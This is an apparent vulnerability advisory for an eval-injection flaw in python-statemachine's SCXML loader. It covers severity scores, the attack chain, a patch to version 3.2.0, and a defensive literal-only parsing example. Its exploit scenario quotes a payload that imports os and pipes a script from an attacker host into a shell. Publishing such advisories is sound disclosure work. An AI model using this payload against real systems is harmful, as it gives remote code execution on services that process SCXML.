
python-statemachine CVE-2026-47103

CRITICAL · Eval Injection (CWE-95)
2026-06-17 · VulnCheck
CVSS 4.0 score 9.3 (Vendor: VulnCheck)

Severity by source

Vendor (VulnCheck), primary: 9.3 CRITICAL
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

vuln.today AI: 9.8 CRITICAL
Attacker-supplied SCXML reaches eval() with no auth or interaction when the loader is used, yielding full code execution in-process, so AV:N/AC:L/PR:N/UI:N and C/I/A:H.
CVSS 3.1: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS 4.0: AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (VulnCheck).

CVSS Vector (Vendor: VulnCheck)

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None

Lifecycle Timeline

Source Code Evidence Fetched: Jun 17, 2026 - 15:35 (vuln.today)
Analysis Generated: Jun 17, 2026 - 15:35 (vuln.today)

Description (CVE.org)

Python StateMachine versions from 3.0.0 up to but not including 3.2.0 contain a remote code execution vulnerability that allows attackers to execute arbitrary code by supplying malicious SCXML documents whose crafted <data expr="..."> attributes are evaluated unsafely. The SCXMLProcessor passes attacker-controlled expression strings through a call chain that ends in Python's built-in eval() without sandboxing, enabling arbitrary code execution in the context of the hosting process.

Analysis (AI)

Remote code execution in python-statemachine 3.0.0 through 3.1.x allows attackers to run arbitrary Python in the host process by supplying a crafted SCXML document whose <data expr="..."> attributes are passed unsandboxed to eval() inside SCXMLProcessor. The flaw was reported by VulnCheck; exploit code is publicly available and a vendor advisory exists (GHSA-v4jc-pm6r-3vj8). No in-the-wild exploitation had been identified at the time of analysis, and the flaw is not listed in CISA KEV.


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata

Access: Identify app ingesting SCXML documents
Delivery: Craft SCXML with malicious <data expr> payload
Exploit: Submit document via upload or API
Execution: SCXMLProcessor passes expr to eval()
Persist: Arbitrary Python runs as service account
Impact: Establish persistence or pivot internally

Vulnerability Assessment (AI)

Exploitation: The hosting application must use the experimental, previously undocumented SCXML loader, specifically statemachine.io.scxml.SCXMLProcessor or any code path that parses a .scxml file, and must ingest that document from an untrusted or third-party source. … Additional conditions and limiting factors are described in the full assessment.

Risk Assessment: Vendor-issued CVSS 4.0 is 9.3 (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H), reflecting full confidentiality, integrity, and availability loss with no privileges or user interaction once a malicious SCXML document is processed. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.

Exploit Scenario: An attacker uploads or otherwise delivers an SCXML workflow file containing `<data id="x" expr="__import__('os').system('curl attacker/sh|sh')"/>` to an application that uses SCXMLProcessor to load third-party state-charts. When the host application parses the document, the expression is handed to eval() and executes immediately as the service account, yielding code execution with no authentication or user interaction. …

Remediation: Vendor-released patch: upgrade to python-statemachine 3.2.0 or later (pip install --upgrade 'python-statemachine>=3.2.0'), which replaces the unsafe eval() path with a safe-by-default SCXML datamodel per GHSA-v4jc-pm6r-3vj8. … Detailed patch versions, workarounds, and compensating controls in full report.
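To make "safe-by-default datamodel" concrete, the following added example (not python-statemachine's own code and not the vendor's patch) builds the SCXML datamodel with ast.literal_eval instead of eval(), so a <data expr> can only ever be a Python literal, and adds an audit helper that flags non-literal expressions in a document before it reaches any eval()-based loader. The SCXML namespace handling, the sample documents and all function names are assumptions of this example.

```python
import ast
import xml.etree.ElementTree as ET

SCXML_NS = "http://www.w3.org/2005/07/scxml"
DATA_TAGS = {"data", "{%s}data" % SCXML_NS}  # <data> with or without the SCXML namespace

class UnsafeExpression(ValueError):
    """A <data expr> that is anything other than a plain Python literal."""

def evaluate_data_expr(expr: str):
    # ast.literal_eval accepts only literals (numbers, strings, bools, None,
    # tuples, lists, dicts, sets); calls, names and attribute access raise,
    # so unlike eval() the expression cannot run code.
    try:
        return ast.literal_eval(expr.strip())
    except (ValueError, SyntaxError, TypeError, MemoryError, RecursionError) as exc:
        raise UnsafeExpression(f"rejected non-literal expr {expr!r}") from exc

def load_datamodel(scxml_text: str) -> dict:
    """Initial datamodel from <data id=... expr=...>, failing closed on a non-literal."""
    datamodel = {}
    for elem in ET.fromstring(scxml_text).iter():  # prefer defusedxml in production
        if elem.tag not in DATA_TAGS:
            continue
        data_id = elem.get("id")
        if data_id is None:
            raise ValueError("<data> element without an id attribute")
        expr = elem.get("expr")
        datamodel[data_id] = None if expr is None else evaluate_data_expr(expr)
    return datamodel

def audit_scxml(scxml_text: str) -> list:
    """Ids of <data> elements whose expr is not a literal (flag before loading)."""
    flagged = []
    for elem in ET.fromstring(scxml_text).iter():
        if elem.tag in DATA_TAGS and elem.get("expr") is not None:
            try:
                evaluate_data_expr(elem.get("expr"))
            except UnsafeExpression:
                flagged.append(elem.get("id"))
    return flagged

# Constructed sample documents, not taken from the advisory.
SAFE_DOC = """<scxml xmlns="http://www.w3.org/2005/07/scxml" version="1.0" initial="idle">
  <datamodel><data id="retries" expr="3"/><data id="tags" expr="['a', 'b']"/><data id="unset"/></datamodel>
  <state id="idle"/>
</scxml>"""
UNSAFE_DOC = SAFE_DOC.replace('expr="3"', "expr=\"len('abc')\"")  # a call, not a literal
```

Run audit_scxml on every inbound document in a service that still ships an affected version; a non-empty result is the document to quarantine and log.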

Recommended Action (AI)

24 hours: Inventory all systems running python-statemachine 3.0.0-3.1.x and determine which are exposed to untrusted SCXML input sources. …

